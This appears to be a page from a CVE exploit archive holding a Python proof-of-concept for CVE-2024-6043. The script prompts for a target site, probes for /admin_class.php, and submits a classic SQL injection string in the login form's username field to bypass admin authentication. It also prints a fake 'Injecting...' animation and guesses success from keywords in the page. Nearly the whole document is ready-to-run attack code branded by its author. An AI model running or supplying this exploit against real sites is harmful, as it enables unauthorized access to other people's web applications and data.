4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-6043.py PY
import requests
import time
import sys


laz_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}

def check_path_exists(laz_url):
    try:
        response = requests.get(laz_url, headers=laz_headers)
        if response.status_code == 200:
            return True
        else:
            return False
    except requests.exceptions.RequestException as e:
        print(f"Error checking the path: {e}")
        return False

def inject_payload(laz_url, laz_payload):
    laz_data = {
        "username": laz_payload,
        "password": "any_password"
    }
    try:
        response = requests.post(laz_url, data=laz_data, headers=laz_headers)
        return response
    except requests.exceptions.RequestException as e:
        print(f"Error during injection: {e}")
        return None

def simulate_injection():
    animation = "|/-\\"
    for _ in range(20):
        sys.stdout.write(f"\rInjecting... {animation[_ % len(animation)]}")
        sys.stdout.flush()
        time.sleep(0.1)
    print("\rInjection complete.          ")

def check_injection_success(laz_response):
    # Cheking for comon signs of SQL Inje
    if any(keyword in laz_response.text for keyword in ["Welcome", "Dashboard", "admin", "logout"]):
        return True
    return False

def main():
    print("""
 ██████╗██╗   ██╗███████╗      ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██████╗  ██████╗ ██╗  ██╗██████╗ 
██╔════╝██║   ██║██╔════╝      ╚════██╗██╔═████╗╚════██╗██║  ██║      ██╔════╝ ██╔═████╗██║  ██║╚════██╗
██║     ██║   ██║█████╗  █████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗███████╗ ██║██╔██║███████║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝  ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══██╗████╔╝██║╚════██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗      ███████╗╚██████╔╝███████╗     ██║      ╚██████╔╝╚██████╔╝     ██║██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝      ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═════╝  ╚═════╝      ╚═╝╚═════╝ 
                                                                                                        
          BY @GhostByte discord.gg/byt
""")
    laz_target = input("Enter the target site (e.g., http://target-site.com): ").strip()
    laz_admin_path = laz_target + "/admin_class.php"

    print(f"Checking if {laz_admin_path} exists...")
    if check_path_exists(laz_admin_path):
        print("The path exists.")
        proceed = input("Do you want to inject the payload? (Y/N): ").strip().lower()
        if proceed == 'y':
            laz_payload = "' OR '1'='1"
            simulate_injection()
            laz_response = inject_payload(laz_admin_path, laz_payload)
            if laz_response and check_injection_success(laz_response):
                print("SQL Injection successful! Admin login bypassed.")
            else:
                print("SQL Injection failed. The target might be patched or not vulnerable.")
        else:
            print("Injection aborted by the user.")
    else:
        print(f"The path {laz_admin_path} does not exist. Exiting.")

if __name__ == "__main__":
    main()